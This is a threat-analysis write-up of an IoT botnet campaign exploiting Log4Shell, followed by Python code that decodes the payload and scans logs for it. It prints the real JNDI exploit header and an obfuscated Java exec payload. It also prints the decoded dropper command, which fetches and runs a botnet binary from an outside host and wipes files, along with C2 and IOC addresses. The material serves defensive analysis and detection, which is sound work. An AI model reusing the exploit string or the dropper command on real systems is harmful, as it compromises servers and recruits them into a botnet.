IoT Botnet exploiting Log4J CVE-2021-44228

Attack info:
User-Agent header: ${jndi:ldap://179.43.175.101:1389/o=tomcat}
Attacker IP: 107.189.29.181

The payload is Base64 encoded:

The decoded string is:

The payload is JavaScript code that is executed inside Java through the ScriptEngineManager. The shell command is assembled at runtime with String.fromCharCode from a list of character codes:
java.lang.Runtime.getRuntime().exec(String.fromCharCode(99,100,32,47,116,109,112,59,32,119,103,101,116,32,49,57,56,46,57,56,46,54,48,46,54,55,47,98,105,110,115,47,120,56,54,59,32,99,104,109,111,100,32,55,55,55,32,42,59,32,46,47,120,56,54,32,108,111,103,52,106,59,32,114,109,32,45,114,102,32,42))…

Decoding the character codes gives the shell command: cd /tmp; wget 198.98.60.67/bins/x86; chmod 777 *; ./x86 log4j; rm -rf *
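The decoding step above is easy to do by hand once, but an analyst triaging many of these hits wants it automated. The following Python is an added example (not part of the original write-up) that parses every String.fromCharCode(...) call out of a captured payload, rebuilds the shell command, splits it into its stages and pulls the network indicators out of it. The input is a constructed copy of the fromCharCode call shown above; the function and variable names are the example's own.

```python
import re
from typing import Dict, List

# Constructed copy of the attacker's fromCharCode call from the captured payload above
# (the trailing "..." on the page is an elision, not part of the code, so it is omitted here).
CAPTURED_PAYLOAD = (
    "java.lang.Runtime.getRuntime().exec(String.fromCharCode("
    "99,100,32,47,116,109,112,59,32,119,103,101,116,32,49,57,56,46,57,56,46,54,48,46,54,55,"
    "47,98,105,110,115,47,120,56,54,59,32,99,104,109,111,100,32,55,55,55,32,42,59,32,46,47,"
    "120,56,54,32,108,111,103,52,106,59,32,114,109,32,45,114,102,32,42))"
)

# Matches the argument list of String.fromCharCode(...): integers separated by commas.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)")
# Dotted-quad IPv4 addresses and bare "ip/path" download URLs as used by this dropper.
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"(?:https?://)?(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/[^\s;]*")


def decode_fromcharcode(js_source: str) -> List[str]:
    """Decode every String.fromCharCode(...) call in js_source back into plain text."""
    decoded = []
    for match in FROMCHARCODE_RE.finditer(js_source):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(code) for code in codes))
    return decoded


def split_stages(command: str) -> List[str]:
    """Split a ';'-chained shell one-liner into its individual stages, in order."""
    return [stage.strip() for stage in command.split(";") if stage.strip()]


def extract_iocs(command: str) -> Dict[str, List[str]]:
    """Collect the IP addresses and download URLs referenced by the recovered command."""
    return {
        "ips": sorted(set(IPV4_RE.findall(command))),
        "urls": sorted(set(URL_RE.findall(command))),
    }


if __name__ == "__main__":
    for command in decode_fromcharcode(CAPTURED_PAYLOAD):
        print("recovered command:", command)
        for index, stage in enumerate(split_stages(command), start=1):
            print(f"  stage {index}: {stage}")
        print("  indicators:", extract_iocs(command))
```

Running the block prints the recovered command, its five stages (change to /tmp, fetch the binary, make everything executable, run it with the argument "log4j", then delete the working files) and the payload host, which can be fed straight into blocklists or a detection rule.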

The downloaded file is a statically linked x86 ELF botnet sample:
Scans TCP ports: 2323, 23, 37215, 8080
C2: 209.141.61.220:5555
Brief sandbox analysis: https://elfdigest.com/brief/e9744244461056c64fc390591729c035f3a375bc8ecfa1a0c111defa055c1273

IOCs:
ldap://179.43.175.101:1389/o=tomcat
198.98.60.67/bins/x86
e9744244461056c64fc390591729c035f3a375bc8ecfa1a0c111defa055c1273
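To turn the attack info and the IOC list above into something a defender can run over web server logs, the following Python is an added example (not part of the original write-up). It parses Apache combined-format lines, flags the ${jndi:...} lookup in the User-Agent, request line or Referer, reports the scheme and callback target of the lookup, and tags any line that mentions one of the hosts from this campaign. The log lines are constructed samples; the regexes, the JNDI pattern (which matches only the plain form seen above, not nested-lookup obfuscations) and the function names are the example's own.

```python
import re
from typing import Dict, List

# Constructed sample log: two requests carrying the JNDI lookup in User-Agent from the
# attacker IP seen above, followed by one benign request from a documentation-range IP.
SAMPLE_LOG = """\
107.189.29.181 - - [11/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://179.43.175.101:1389/o=tomcat}"
107.189.29.181 - - [11/Dec/2021:10:01:13 +0000] "GET /login HTTP/1.1" 404 196 "-" "${jndi:ldap://179.43.175.101:1389/o=tomcat}"
203.0.113.7 - - [11/Dec/2021:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Hosts listed in the IOC and analysis sections of this note.
CAMPAIGN_IOCS = {
    "179.43.175.101": "LDAP callback server for the JNDI lookup",
    "198.98.60.67": "payload host serving bins/x86",
    "209.141.61.220": "botnet C2 (port 5555)",
    "107.189.29.181": "attacker source IP",
}

# Apache combined log format: src ident user [ts] "request" status size "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Plain ${jndi:<scheme>://<host:port>/...} lookup; captures the scheme and callback target.
JNDI_RE = re.compile(
    r"\$\{[^}]{0,60}?jndi:(?P<scheme>[a-z]+)://(?P<target>[^/}\s]+)", re.IGNORECASE
)


def scan_log(text: str) -> List[dict]:
    """Return one finding per suspicious line: source IP, timestamp and the reasons."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not combined format; a real deployment would count these
        fields = match.groupdict()
        reasons = []
        for header in ("ua", "req", "referer"):
            hit = JNDI_RE.search(fields[header])
            if hit:
                reasons.append(
                    f"JNDI lookup in {header} via {hit.group('scheme').lower()} "
                    f"to {hit.group('target')}"
                )
        for ioc, description in CAMPAIGN_IOCS.items():
            if ioc in line:
                reasons.append(f"known IOC {ioc}: {description}")
        if reasons:
            findings.append({"src": fields["src"], "ts": fields["ts"], "reasons": reasons})
    return findings


def suspicious_sources(findings: List[dict]) -> List[str]:
    """Unique source IPs across the findings, e.g. as input for a firewall block list."""
    return sorted({finding["src"] for finding in findings})


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for finding in results:
        print(finding["ts"], finding["src"])
        for reason in finding["reasons"]:
            print("   -", reason)
    print("sources to block:", suspicious_sources(results))
```

The JNDI match is the higher-value signal here: the IOC hosts change between campaigns, while the lookup string has to reach the vulnerable logger in some header or parameter, so the same scan can be pointed at other logged fields by extending the header list.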